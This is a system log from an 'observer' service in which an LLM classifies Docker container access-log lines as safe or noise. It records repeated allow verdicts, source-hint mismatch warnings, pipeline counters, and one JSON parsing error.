Mar 19 22:24:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:48.825275 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.762869 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.762900 [analyzer] Source hint mismatch: LLM says "nginx access logs in docker container", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.931826 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.90 action=allow pattern_type=prefix
Mar 19 22:24:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:51.931866 [analyzer] Source hint mismatch: LLM says "nginx/apache reverse proxy access logs in Docker", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern
Mar 19 22:24:53 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:53.699112 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:24:53 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:53.699146 [analyzer] Source hint mismatch: LLM says "nginx (docker:captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:54.475057 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:54.475087 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:57.965253 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:24:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:57.965291 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:00.997316 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:00.997352 [analyzer] Source hint mismatch: LLM says "docker container access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:03.622678 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:03.622716 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.159410 [observer] Pipeline: processed=26 pattern_hits=11 llm_calls=14 llm_errors=0 learned=0
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.159529 [observer] Patterns: hash=11 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=15
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.957957 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:06.957999 [analyzer] Source hint mismatch: LLM says "docker container access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:09.539445 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.66 action=allow pattern_type=prefix
Mar 19 22:25:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:09.539478 [analyzer] Source hint mismatch: LLM says "docker container web access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:12.785135 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:25:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:12.785185 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:15.734353 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:15.734386 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:19.453489 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:25:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:19.453550 [analyzer] Source hint mismatch: LLM says "docker HTTP access log for captain-captain container", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:21.838846 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:21.838895 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:24.757375 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:25:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:24.757414 [analyzer] Source hint mismatch: LLM says "docker/captain web app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:26.005148 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:26.005207 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) running an API web service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:27.776675 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:25:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:27.776708 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web/API access)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:30.726585 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:25:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:30.726622 [analyzer] Source hint mismatch: LLM says "docker container web/app access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:33.871825 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:33.871860 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.160121 [observer] Pipeline: processed=50 pattern_hits=24 llm_calls=25 llm_errors=0 learned=0
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.160144 [observer] Patterns: hash=24 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=26
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.753293 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.753323 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "duration" seen in 20/20 lines, example: "20.713 ms" → "<DUR>"
Mar 19 22:25:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:36.753336 [analyzer] Source hint mismatch: LLM says "docker container (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766469 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766497 [hints] Suggestion for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: field type "timestamp" seen in 12/21 lines, example: "2026-03-19T22:25:38.596385133Z" → "<TS>"
Mar 19 22:25:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:39.766510 [analyzer] Source hint mismatch: LLM says "docker container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:42.910532 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:25:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:42.910570 [analyzer] Source hint mismatch: LLM says "docker/captain application web server (access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:45.728879 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:25:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:45.728913 [analyzer] Source hint mismatch: LLM says "docker container access to application HTTP logs endpoint", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:48.720141 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:48.720199 [analyzer] Source hint mismatch: LLM says "docker (containerized web/app server access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:51.610593 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.55 action=suppress pattern_type=prefix
Mar 19 22:25:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:51.610635 [analyzer] Source hint mismatch: LLM says "docker container access log / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:54.944997 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:25:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:54.945036 [analyzer] Source hint mismatch: LLM says "docker-captain (web/API access via container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:25:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:57.771709 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:25:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:25:57.771749 [analyzer] Source hint mismatch: LLM says "docker/access logging for an application (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:00.745679 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:26:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:00.745719 [analyzer] Source hint mismatch: LLM says "docker app access log (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:03.766686 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:26:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:03.766722 [analyzer] Source hint mismatch: LLM says "dockerized application (HTTP/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.159460 [observer] Pipeline: processed=74 pattern_hits=38 llm_calls=35 llm_errors=0 learned=0
Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.159482 [observer] Patterns: hash=38 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=36
Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.651926 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:26:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:06.651968 [analyzer] Source hint mismatch: LLM says "docker container access/application logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:09.818013 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:26:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:09.818048 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / application HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:12.763713 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:12.763750 [analyzer] Source hint mismatch: LLM says "docker (app container HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:16.082775 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:26:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:16.082810 [analyzer] Source hint mismatch: LLM says "docker container access/API gateway", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:18.928797 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:18.929560 [analyzer] Source hint mismatch: LLM says "docker access log / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:21.880030 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:21.880065 [analyzer] Source hint mismatch: LLM says "dockerized web/app container (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702876 [llm] Failed to parse verdict from: {
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "classification": "safe",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "confidence": 0.72,
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "reason": "Appears to be a routine HTTP GET request to an application API endpoint returning 304 (not modified) with a low latency.",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "action": "allow",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "pattern_type": "prefix",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "pattern": "GET /api/v2/user/apps/appData/api",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "source_hint": "docker (captain web/app access logs)",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   "variable_fields": [
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "token": "",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "type": "",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "replacement": ""
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "token": "304",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "type": "port",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "replacement": "<STATUS>"
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     },
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     {
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "token": "2.190 ms",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "type": "duration",
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:       "replacement": "<DUR>"
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:     }
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]:   ]
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: }
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702911 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal
Mar 19 22:26:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:24.702921 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:26:23.583734303Z GET /api/v2/user/apps/appData/api 304 2.190 ms - -
Mar 19 22:26:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:25.858892 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:25.858928 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse-proxy", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:27.686967 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=contains
Mar 19 22:26:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:27.687011 [analyzer] Source hint mismatch: LLM says "docker/app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:30.809293 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:26:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:30.809329 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (containerized web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:33.808520 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:33.808556 [analyzer] Source hint mismatch: LLM says "docker/http-access (captain-captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.160444 [observer] Pipeline: processed=98 pattern_hits=51 llm_calls=46 llm_errors=1 learned=0
Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.160467 [observer] Patterns: hash=51 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=47
Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.823122 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:26:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:36.823230 [analyzer] Source hint mismatch: LLM says "docker (web request access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:39.618056 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:26:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:39.618092 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:42.790669 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:42.790706 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:45.810191 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:26:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:45.810226 [analyzer] Source hint mismatch: LLM says "docker container access log (captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:48.891128 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:26:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:48.891195 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:51.726704 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.76 action=allow pattern_type=prefix
Mar 19 22:26:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:51.726740 [analyzer] Source hint mismatch: LLM says "docker container (web/app HTTP access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:54.862397 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:26:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:54.862431 [analyzer] Source hint mismatch: LLM says "docker (application HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:26:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:57.761324 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:26:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:26:57.761362 [analyzer] Source hint mismatch: LLM says "docker container access log / reverse proxy (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:00.585571 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:27:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:00.585610 [analyzer] Source hint mismatch: LLM says "docker container web service (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:03.951384 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:27:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:03.951423 [analyzer] Source hint mismatch: LLM says "docker container (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.159702 [observer] Pipeline: processed=121 pattern_hits=64 llm_calls=56 llm_errors=1 learned=0
Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.159725 [observer] Patterns: hash=64 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=57
Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.786079 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:27:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:06.786126 [analyzer] Source hint mismatch: LLM says "docker container access logs / app HTTP handler", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:09.654496 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:27:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:09.654535 [analyzer] Source hint mismatch: LLM says "docker container http access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:27:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:12.957078 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains
Mar 19 22:27:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:27:12.957117 [analyzer] Source hint mismatch: LLM says "dockerized web API (captain-captain service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
